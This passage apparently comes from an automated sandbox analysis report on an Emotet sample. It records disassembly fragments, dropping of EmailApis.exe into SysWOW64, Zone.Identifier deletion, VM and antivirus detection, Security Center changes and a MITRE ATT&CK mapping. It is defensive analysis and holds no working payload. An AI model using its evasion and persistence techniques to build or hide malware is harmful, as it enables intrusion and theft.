                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02186080 push ecx; mov dword ptr [esp], 000093C3h1_2_02186081
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02185EA0 push ecx; mov dword ptr [esp], 0000B3C5h1_2_02185EA1
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02185EC0 push ecx; mov dword ptr [esp], 0000C070h1_2_02185EC1
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02185F20 push ecx; mov dword ptr [esp], 00003106h1_2_02185F21
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02185F40 push ecx; mov dword ptr [esp], 0000A80Dh1_2_02185F41
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02185F80 push ecx; mov dword ptr [esp], 0000FC88h1_2_02185F81
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02185DC0 push ecx; mov dword ptr [esp], 00009C10h1_2_02185DC1
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02185FE0 push ecx; mov dword ptr [esp], 0000CC57h1_2_02185FE1
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02057C1E push ecx; mov dword ptr [esp], 000093C3h1_2_02057C1F
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02058C1E push edi; ret 1_2_02058C24
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02057A3E push ecx; mov dword ptr [esp], 0000B3C5h1_2_02057A3F
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02057A5E push ecx; mov dword ptr [esp], 0000C070h1_2_02057A5F
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02057ABE push ecx; mov dword ptr [esp], 00003106h1_2_02057ABF
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02057ADE push ecx; mov dword ptr [esp], 0000A80Dh1_2_02057ADF
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_0205DAF5 push ss; ret 1_2_0205DB22
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_0205D71C push FFFFFFB9h; iretd 1_2_0205D731
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02057B1E push ecx; mov dword ptr [esp], 0000FC88h1_2_02057B1F
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_0205795E push ecx; mov dword ptr [esp], 00009C10h1_2_0205795F
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02057B7E push ecx; mov dword ptr [esp], 0000CC57h1_2_02057B7F
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_020579AE push ecx; mov dword ptr [esp], 00006163h1_2_020579AF

                Persistence and Installation Behavior:

                barindex
                Drops executables to the windows directory (C:\Windows) and starts themShow sources
                Source: C:\Users\user\Desktop\2pf7VAYK.exeExecutable created and started: C:\Windows\SysWOW64\vcamp120\EmailApis.exeJump to behavior
                Source: C:\Users\user\Desktop\2pf7VAYK.exePE file moved: C:\Windows\SysWOW64\vcamp120\EmailApis.exeJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Users\user\Desktop\2pf7VAYK.exeFile opened: C:\Windows\SysWOW64\vcamp120\EmailApis.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\2pf7VAYK.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6604Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\2pf7VAYK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02183810 FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,1_2_02183810
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: 0_2_00407513 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_00407513
                Source: svchost.exe, 00000006.00000002.442604585.000001CF19461000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAWGlobal\BFE_Notify_Event_{6c879189-1c04-4de8-b836-558b3f4
                Source: svchost.exe, 00000004.00000002.259893485.0000018A2AB40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.300949450.000001EDBD540000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000006.00000002.441267653.000001CF13C2A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW-F
                Source: EmailApis.exe, 00000001.00000002.442315916.000000000288E000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.442587509.000001CF19454000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000004.00000002.259893485.0000018A2AB40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.300949450.000001EDBD540000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000004.00000002.259893485.0000018A2AB40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.300949450.000001EDBD540000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 00000008.00000002.441134023.000001B8E2829000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000004.00000002.259893485.0000018A2AB40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.300949450.000001EDBD540000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: 0_2_0040BD50 LoadLibraryW,GetProcAddress,0_2_0040BD50
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02184E20 mov eax, dword ptr fs:[00000030h]1_2_02184E20
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02183EE0 mov eax, dword ptr fs:[00000030h]1_2_02183EE0
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02050456 mov eax, dword ptr fs:[00000030h]1_2_02050456
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02055A7E mov eax, dword ptr fs:[00000030h]1_2_02055A7E
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_0205095E mov eax, dword ptr fs:[00000030h]1_2_0205095E
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_020569BE mov eax, dword ptr fs:[00000030h]1_2_020569BE
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02161030 mov eax, dword ptr fs:[00000030h]1_2_02161030
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02182210 CryptExportKey,CryptEncrypt,CryptDestroyHash,GetProcessHeap,RtlAllocateHeap,CryptGetHashParam,memcpy,CryptDuplicateHash,1_2_02182210
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: 0_2_0040568A SetUnhandledExceptionFilter,0_2_0040568A
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: 0_2_0040569E SetUnhandledExceptionFilter,0_2_0040569E
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_0040568A SetUnhandledExceptionFilter,1_2_0040568A
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_0040569E SetUnhandledExceptionFilter,1_2_0040569E
                Source: EmailApis.exe, 00000001.00000002.441563979.0000000000C40000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: EmailApis.exe, 00000001.00000002.441563979.0000000000C40000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: EmailApis.exe, 00000001.00000002.441563979.0000000000C40000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: EmailApis.exe, 00000001.00000002.441563979.0000000000C40000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: GetLocaleInfoA,0_2_00407307
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: GetLocaleInfoA,1_2_00407307
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: 0_2_00404E55 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00404E55
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: 0_2_00402168 EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,_fast_error_exit,_fast_error_exit,GetCommandLineA,GetStartupInfoA,__wincmdln,GetModuleHandleA,0_2_00402168
                Source: C:\Users\user\Desktop\2pf7VAYK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings:

                barindex
                Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                Source: svchost.exe, 0000000C.00000002.441352229.000002CB28E3D000.00000004.00000001.sdmpBinary or memory string: &@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
                Source: svchost.exe, 0000000C.00000002.441409317.000002CB28F02000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                Stealing of Sensitive Information:

                barindex
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000001.00000002.441742476.0000000002181000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.178857289.0000000000701000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.178799595.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.441723707.0000000002164000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.178837009.00000000006E4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.441653243.0000000002050000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.2pf7VAYK.exe.700000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.EmailApis.exe.2180000.1.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection2Masquerading121Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery51Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncSystem Information Discovery36Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 289509